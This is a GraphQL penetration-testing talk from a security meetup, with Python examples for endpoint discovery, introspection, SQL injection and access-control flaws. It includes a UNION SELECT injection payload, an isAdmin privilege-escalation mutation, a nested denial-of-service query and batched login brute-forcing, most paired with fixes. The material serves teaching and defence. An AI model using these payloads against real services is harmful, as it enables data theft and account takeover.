Pentest Application With GraphQL
Presented By: Divyanshu Shukla (@justm0rph3u5)
Agenda
• What is GraphQL
• REST vs GraphQL
• Example for REST/GraphQL
• Architecture
• Basics
• Pentesting GraphQL
What Is GraphQL?
• API query language and specification developed at Facebook and open-sourced in 2015.
• GraphQL is a query language for APIs, not for databases.
• It is database-agnostic and can be used anywhere an API is used.
• GraphQL enables declarative data fetching: the client states exactly which fields it wants back.
• GraphQL is used in production by companies such as GitHub, Twitter and Coursera.
REST vs GraphQL?
• REST needs multiple round trips to fetch related resources; GraphQL fetches them in one request.
• REST endpoints over-fetch or under-fetch; GraphQL returns only the fields the client selected.
• Rapid product iterations on the frontend: the client changes its query instead of waiting for a new endpoint.
• Benefits of a schema and type system: the API is self-describing and every request is validated against it.
REST vs GraphQL Example
REST Example
GraphQL Example
Architecture
Ref: https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
Basics Terminology
• Schema Definition Language
• Object Types & Fields
• Arguments
• Aliases
• Fragments
• Variables
• Directives
• Types of Requests:
  o Query
  o Mutations
  o Subscriptions
Pentesting GraphQL
• Tools
• Enumeration
• Introspection
• SQL Injection
• Information Disclosure
• Broken Access Control
• Authorization Bypass
• Brute Force/Denial Of Service
Tools
• Altair GraphQL Client / GraphiQL IDE.
• GraphQL Raider (Burp Suite extension).
• GraphQL_Introspection.py (Python script by Doyensec).
• GraphQL Voyager (https://apis.guru/graphql-voyager/).
GraphQL Tip
• Pentesting an app that uses GraphQL? POST is more common, but remember that many servers accept GET too. URL-encode the document and hit /graphql?query=. E.g. a schema request as GET:
https://example.com/graphql?query={__schema%20{%0atypes%20{%0aname%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a}
(decoded: { __schema { types { name kind description fields { name } } } })
Thanks to https://twitter.com/coffeetocode
Enumeration
• Look at the traffic the client sends to the server (browser dev tools or an intercepting proxy) to find the GraphQL endpoint. Common paths:
  o /graphql/
  o /graphql/console/
  o /graphql.php
  o /graphiql/
  o /graphiql.php
• Send a malformed document such as {} to a candidate endpoint. An error like “Syntax Error: Expected Name, found }” confirms that a GraphQL parser is behind it.
• GraphQL endpoints may ship with a GUI (GraphiQL/console); if present, its Docs panel exposes the schema directly.
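The enumeration steps above as a small script. This is an added example, not code from the slides: CANDIDATE_PATHS is the slides' list plus a few common variants (an assumption), the response bodies it is shown classifying are constructed, and probe() is the only function that touches the network.

```python
"""Find and fingerprint a GraphQL endpoint (added example, not the slides' code).
CANDIDATE_PATHS extends the slides' list with assumed common variants; probe()
is the only network call, everything else runs offline."""
import json
import urllib.error
import urllib.parse
import urllib.request

CANDIDATE_PATHS = ["/graphql", "/graphql/", "/graphql/console/", "/graphql.php",
                   "/graphiql", "/graphiql/", "/graphiql.php", "/api/graphql", "/v1/graphql"]

# A deliberately malformed document. graphql-js answers
# "Syntax Error: Expected Name, found }"; other engines word it differently
# but still wrap it in the {"errors": [...]} envelope.
PROBE_QUERY = "{}"

def candidate_urls(base):
    """GET form of the probe for every candidate path under `base`."""
    base = base.rstrip("/")
    qs = urllib.parse.urlencode({"query": PROBE_QUERY})
    return [f"{base}{path}?{qs}" for path in CANDIDATE_PATHS]

def looks_like_graphql(body):
    """True if the body is a GraphQL response envelope ("data"/"errors") or a
    GraphiQL console page; a generic 404 or HTML page is neither."""
    try:
        doc = json.loads(body)
    except ValueError:
        return "GraphiQL" in body              # the in-browser IDE's HTML
    if not isinstance(doc, dict):
        return False
    errors = doc.get("errors")
    if isinstance(errors, list) and errors:
        msgs = " ".join(str(e.get("message", "")) for e in errors if isinstance(e, dict))
        return ("Syntax Error" in msgs or "Expected Name" in msgs
                or "Must provide query string" in msgs or "data" in doc)
    return "data" in doc

def probe(base, timeout=5):
    """GET every candidate URL and return those whose body fingerprints as
    GraphQL. 4xx bodies are read too: the syntax error comes back as a 400."""
    hits = []
    for url in candidate_urls(base):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as r:
                body = r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            body = e.read().decode("utf-8", "replace")
        except (urllib.error.URLError, OSError):
            continue
        if looks_like_graphql(body):
            hits.append(url)
    return hits

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:4000"
    for hit in probe(target):
        print("graphql endpoint:", hit)
```

The fingerprint is a heuristic: it keys on the response envelope and the parser error text rather than on the path, so an endpoint mounted at an unlisted path still matches once you feed its body to looks_like_graphql().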
Introspection
• GraphQL allows querying metadata via an introspection query that describes the schema: its types, fields, arguments and their descriptions.
• It is similar to the information_schema tables in databases.
• It lets an attacker find out which queries and mutations exist and which arguments they take.
• GraphQL Introspection Query: https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d
• Developers can disable introspection in production, but the majority of applications leave it open.
• Hands-On: Hackerone
Ref: https://graphqlmastery.com/blog/graphql-introspection-and-introspection-queries
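The GET/POST tip and the introspection step worked through in code. This is an added example, not the slides' code or any tool's: it builds the GET URL (URL-encoded ?query=) and the equivalent POST body, then walks an introspection result to list every root query and mutation field with its arguments and return type, which is the input for the injection and authorization tests that follow. SAMPLE_RESPONSE is a constructed server reply, and the trimmed INTROSPECTION_QUERY is a subset of the full query in the gist above.

```python
"""Introspection probe and schema mapping (added example, not the slides' code).
SAMPLE_RESPONSE is a constructed reply; the query is a subset of the full one."""
import json
from urllib.parse import urlencode

# Enough of the standard introspection query to recover operations, their
# arguments and return types (the full gist also pulls enums, inputs, directives).
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      kind name description
      fields(includeDeprecated: true) {
        name description
        args { name type { ...TypeRef } }
        type { ...TypeRef }
      }
    }
  }
}
fragment TypeRef on __Type {
  kind name ofType { kind name ofType { kind name ofType { kind name } } }
}
"""

def get_url(endpoint, query):
    """GET form: the whole document goes in the query string, percent-encoded."""
    return endpoint + "?" + urlencode({"query": query})

def post_body(query, variables=None):
    """POST form: application/json with "query" and optional "variables"."""
    return json.dumps({"query": query, "variables": variables or {}})

def type_name(t):
    """Render a TypeRef chain (NON_NULL/LIST wrappers) as SDL, e.g. [User!]!"""
    if t["kind"] == "NON_NULL":
        return type_name(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + type_name(t["ofType"]) + "]"
    return t["name"]

def introspection_disabled(response):
    """No __schema in data plus an error naming introspection means it is off."""
    if (response.get("data") or {}).get("__schema"):
        return False
    msgs = " ".join(e.get("message", "") for e in response.get("errors") or [])
    return "introspection" in msgs.lower() or "__schema" in msgs

def root_fields(response):
    """{'queryType': ['user(id: ID!): User', ...], 'mutationType': [...]}"""
    schema = response["data"]["__schema"]
    by_name = {t["name"]: t for t in schema["types"]}
    out = {}
    for op in ("queryType", "mutationType"):
        root = schema.get(op)
        if not root:
            continue
        out[op] = []
        for f in by_name[root["name"]].get("fields") or []:
            args = ", ".join(f"{a['name']}: {type_name(a['type'])}" for a in f["args"])
            out[op].append(f"{f['name']}({args}): {type_name(f['type'])}")
    return out

def type_ref(kind, name=None, of=None):
    """Builder for the nested TypeRef dicts used in the constructed reply."""
    return {"kind": kind, "name": name, "ofType": of}

# Constructed reply, trimmed to what root_fields() needs.
SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "description": None, "fields": [
            {"name": "users", "description": None, "args": [],
             "type": type_ref("LIST", of=type_ref("OBJECT", "User"))},
            {"name": "user", "description": None,
             "args": [{"name": "id", "type": type_ref("NON_NULL", of=type_ref("SCALAR", "ID"))}],
             "type": type_ref("OBJECT", "User")}]},
        {"kind": "OBJECT", "name": "Mutation", "description": None, "fields": [
            {"name": "createPerson", "description": None,
             "args": [{"name": "username", "type": type_ref("SCALAR", "String")},
                      {"name": "password", "type": type_ref("SCALAR", "String")},
                      {"name": "isAdmin", "type": type_ref("SCALAR", "Boolean")}],
             "type": type_ref("OBJECT", "User")}]},
        {"kind": "OBJECT", "name": "User", "description": None, "fields": [
            {"name": "id", "description": None, "args": [], "type": type_ref("SCALAR", "ID")},
            {"name": "email", "description": None, "args": [], "type": type_ref("SCALAR", "String")},
            {"name": "isAdmin", "description": None, "args": [], "type": type_ref("SCALAR", "Boolean")}]},
    ]}}}

if __name__ == "__main__":
    print(get_url("https://example.com/graphql", "{__schema{types{name}}}"))
    for op, fields in root_fields(SAMPLE_RESPONSE).items():
        print(op, *fields, sep="\n  ")
```

The mutation line that root_fields() prints for the sample, createPerson(username: String, password: String, isAdmin: Boolean): User, is exactly the kind of hint that leads to the authorization-bypass test later in the deck: an argument the client was never meant to control is visible in the schema.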
Injection
• Most applications are backed by a database, so resolvers that build queries from GraphQL arguments by string concatenation are open to SQL injection, NoSQL injection and other injections. GraphQL validates an argument's type (e.g. String), not its content.
• Detect SQL injection with a single quote in an argument, then exploit it with UNION SELECT.
• sqlmap can also be used for exploitation (point it at the JSON request body and mark the injectable value).
• There is a high chance that an application has multiple parameters vulnerable to SQL injection, since each resolver is written separately.
• Example: https://blog.usejournal.com/time-based-blind-sql-injection-in-graphql-39a25a1dfb3c
• Hands On: https://pentesterlab.com/exercises/graphql_ii/course
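The detection and UNION SELECT steps above, shown against a vulnerable resolver and its parameterised fix. This is an added example, not code from the slides or from any GraphQL framework: there is no GraphQL engine here, the resolvers take the already-parsed argument dict exactly as a server would hand it to them (which is the point: the GraphQL layer checked that username is a String and nothing more), and the users table with its secret column is constructed.

```python
"""SQL injection through a GraphQL argument (added example, not the slides' code).
No GraphQL engine: the resolvers receive the parsed argument dict as a server
would pass it. The sqlite table and rows are constructed."""
import sqlite3

def setup_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice-api-key');
        INSERT INTO users VALUES (2, 'admin', 'admin-api-key');
    """)
    return db

def resolve_user_vulnerable(db, args):
    """Resolver for `user(username: String!) { username }` built by string
    formatting. Returns the matched usernames, or whatever a UNION adds."""
    sql = f"SELECT username FROM users WHERE username = '{args['username']}'"
    return [row[0] for row in db.execute(sql)]

def resolve_user_safe(db, args):
    """Same resolver with a bound parameter: the payload is just a username."""
    return [row[0] for row in db.execute(
        "SELECT username FROM users WHERE username = ?", (args["username"],))]

def graphql_request(payload):
    """What the tester sends. Carrying the payload in `variables` avoids
    escaping quotes inside the GraphQL document; the string reaches the
    resolver untouched."""
    return {"query": "query($u: String!) { user(username: $u) { username } }",
            "variables": {"u": payload}}

def probe_quote(db, resolver):
    """Detection step: a lone single quote breaks the SQL of a concatenating
    resolver and surfaces a database error message. None means no error."""
    try:
        resolver(db, {"username": "'"})
    except sqlite3.Error as e:
        return str(e)
    return None

# Exploitation step: close the string, UNION in a column from another table,
# comment out the trailing quote. Column count (1) must match the original SELECT.
UNION_PAYLOAD = "x' UNION SELECT secret FROM users -- "

if __name__ == "__main__":
    db = setup_db()
    print("probe:", probe_quote(db, resolve_user_vulnerable))
    print("request:", graphql_request(UNION_PAYLOAD))
    print("vulnerable:", resolve_user_vulnerable(db, {"username": UNION_PAYLOAD}))
    print("safe:", resolve_user_safe(db, {"username": UNION_PAYLOAD}))
```

The same payload reaches both resolvers; only the one that splices it into SQL leaks the secret column through a field whose schema type says it returns usernames.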
Information Disclosure
• GraphQL is just a layer between client apps and the database, so back-end errors surface through it.
• Try visiting url/graphql.php?debug=1 (or the equivalent for the framework in use) to find a debug mode with additional error reporting.
• Insert single quotes/double quotes into arguments to provoke errors that reveal the server stack, the database and the GraphQL implementation.
• Walking through id values in a user query may return information about other users (or not, if authorization is configured correctly).
Broken Access Control
• Broken access control lets a low-privilege user read other users' records (id, email, isAdmin flag). A harvested admin email can then be used to brute-force that account's login and gain admin-level access.
• Steps to reproduce:
  o Log in as a normal user and access other users' profile details such as id and email.
• Vulnerable GraphQL query (every user's record is returned, not just the caller's):
query {
  users {
    id
    email
    isAdmin
    isActive
  }
}
Authorization Bypass
• Suppose we can create users:
mutation {
  createPerson(username: "User1", password: "user1") { id isAdmin }
}
• Assuming the server-side handler also accepts an isAdmin argument (introspection will show it), we can send a request of the form:
mutation {
  createPerson(username: "User1", password: "user1", isAdmin: true) { id isAdmin }
}
• and make User1 an administrator. Note that GraphQL booleans are lower-case (true, not True) and that a selection set must name at least one field.
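The two preceding slides (broken access control in the users query, the isAdmin mass assignment in createPerson) as resolver code, each vulnerable form beside its fix. This is an added example, not the slides' code: the in-memory store, the viewer entry in the request context and the resolver signatures are assumptions; the field names follow the slides' queries.

```python
"""Resolver-level authorization and mass assignment (added example, not the
slides' code). Store, `viewer` context entry and signatures are assumptions."""
import copy

SEED = {
    1: {"id": 1, "username": "alice", "email": "alice@example.com",
        "isAdmin": False, "isActive": True},
    2: {"id": 2, "username": "root", "email": "root@example.com",
        "isAdmin": True, "isActive": True},
}

def new_store():
    """Fresh copy of the constructed user table for each run."""
    return copy.deepcopy(SEED)

# query { users { id email isAdmin isActive } }

def resolve_users_vulnerable(store, ctx):
    """Authentication only: any logged-in user lists every account and can
    read off which e-mail belongs to an isAdmin: true user."""
    if ctx.get("viewer") is None:
        raise PermissionError("authentication required")
    return list(store.values())

def resolve_users_safe(store, ctx):
    """Authorization in the resolver: admins list everyone, other users get
    only their own record, so other users' e-mails and flags never leave."""
    viewer = ctx.get("viewer")
    if viewer is None:
        raise PermissionError("authentication required")
    if viewer["isAdmin"]:
        return list(store.values())
    return [store[viewer["id"]]]

# mutation { createPerson(username: "...", password: "...", isAdmin: true) { id isAdmin } }

def create_person_vulnerable(store, ctx, args):
    """Mass assignment: every argument the schema accepted is copied onto the
    new row, so the client's isAdmin: true is honoured."""
    uid = max(store) + 1
    row = {"id": uid, "email": None, "isAdmin": False, "isActive": True}
    row.update({k: v for k, v in args.items() if k != "password"})  # credential storage omitted
    store[uid] = row
    return row

def create_person_safe(store, ctx, args):
    """Allow-list the self-registration fields and refuse anything else.
    Privilege flags are set server-side, never read from input. The schema
    should not expose isAdmin on this mutation at all; this check is defence
    in depth for the case where it does."""
    unexpected = set(args) - {"username", "password"}
    if unexpected:
        raise ValueError(f"unexpected arguments: {sorted(unexpected)}")
    uid = max(store) + 1
    row = {"id": uid, "username": args["username"], "email": None,
           "isAdmin": False, "isActive": True}  # credential storage omitted
    store[uid] = row
    return row

if __name__ == "__main__":
    store = new_store()
    print(resolve_users_vulnerable(store, {"viewer": store[1]}))  # alice sees root's e-mail
    print(resolve_users_safe(store, {"viewer": store[1]}))        # alice sees only alice
    print(create_person_vulnerable(store, {"viewer": None},
                                   {"username": "User1", "password": "user1", "isAdmin": True}))
```

Both fixes live in the resolver rather than at the HTTP layer: a GraphQL endpoint is a single URL, so per-route middleware cannot tell an admin-only field from a public one.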
Brute Force/Denial Of Service
• Brute-forcing email, id and similar parameters.
• Brute-forcing mutations (login, password reset) and similar queries.
• Where rate limiting is absent, a low-privilege or non-admin user can brute-force login credentials and view other users' details.
• Nested queries can cause denial of service: every extra level of comments { author { ... } } multiplies the resolver and database work, for example:
query {
  stories {
    title
    body
    comments {
      comment
      author {
        comments {
          author {
            comments {
              comment
              author {
                comments {
                  comment
                  author {
                    comments {
                      comment
                      author { name }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
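Two cheap server-side guards for the abuse cases on this slide: a depth limit for nested queries, and a cap on the number of root selections, because aliases let a client pack many login attempts into one HTTP request, which a per-request rate limit never sees. This is an added example, not the slides' code or a library's: it tokenises the raw document only far enough to measure selection-set nesting and count root fields, it is not a full GraphQL parser, and the limits in enforce() are illustrative defaults. The batched login mutation is constructed; the nested query is the slide's.

```python
"""Depth and root-selection limits for GraphQL documents (added example, not the
slides' code). Minimal tokeniser, not a parser; limits are illustrative."""
import re

# Strings, block strings and comments are matched whole so a brace inside
# "..." or after # cannot skew the counts; the filter then drops them.
_TOKEN = re.compile(r'"""[\s\S]*?"""|"(?:\\.|[^"\\\n])*"|#[^\n]*|[{}():]|[^\s{}():#"]+')

def tokens(document):
    return [t for t in _TOKEN.findall(document) if not t.startswith(('"', '#'))]

def selection_depth(document):
    """Nesting of selection sets: `{ me { name } }` has depth 1."""
    depth = deepest = 0
    for t in tokens(document):
        if t == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif t == "}":
            depth -= 1
    return max(deepest - 1, 0)

def root_field_count(document):
    """Selections directly under the operation, aliases included: ten aliased
    `login` fields are ten password guesses in a single HTTP request."""
    toks = tokens(document)
    brace = paren = count = i = 0
    while i < len(toks):
        t = toks[i]
        if t == "{":
            brace += 1
        elif t == "}":
            brace -= 1
        elif t == "(":
            paren += 1
        elif t == ")":
            paren -= 1
        elif brace == 1 and paren == 0 and t != ":" and not t.startswith("@"):
            count += 1
            if i + 1 < len(toks) and toks[i + 1] == ":":  # `alias: field` counts once
                i += 2
        i += 1
    return count

def enforce(document, max_depth=5, max_root_fields=10):
    """Return the violations; an empty list means the query may execute."""
    problems = []
    d = selection_depth(document)
    if d > max_depth:
        problems.append(f"depth {d} exceeds limit {max_depth}")
    n = root_field_count(document)
    if n > max_root_fields:
        problems.append(f"{n} root selections exceed limit {max_root_fields}")
    return problems

# The slide's nested query: 12 selection sets counting the operation's own.
NESTED_QUERY = """query { stories { title body comments { comment author { comments {
  author { comments { comment author { comments { comment author { comments {
  comment author { name } } } } } } } } } } } }"""

# Alias batching: one request, three login attempts (constructed).
BATCHED_LOGIN = """mutation {
  a1: login(username: "admin", password: "123456") { token }
  a2: login(username: "admin", password: "password") { token }
  a3: login(username: "admin", password: "admin") { token }
}"""

if __name__ == "__main__":
    for name, doc in (("nested", NESTED_QUERY), ("batched", BATCHED_LOGIN)):
        print(name, "depth", selection_depth(doc), "roots", root_field_count(doc),
              enforce(doc, max_root_fields=2) or "ok")
```

Run these checks before execution, on the parsed or raw document, and keep the login rate limit keyed on the account and the number of attempts rather than on HTTP requests; otherwise the alias batch counts as one try.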
Reference
• https://github.com/graphql/graphiql
• https://www.slideshare.net/NeeluTripathy2/pentesting-graphql-applications
• https://prog.world/pentest-applications-with-graphql/
• https://www.howtographql.com
• https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
• https://blog.doyensec.com/2018/05/17/graphql-security-overview.html
• https://voidsec.com/graphql-security-overview-and-testing-tips/
• https://ctf.hacker101.com
• https://pentesterlab.com/exercises/graphql_ii/course
Pentest Application With GraphQL | Null Bangalore Meetup
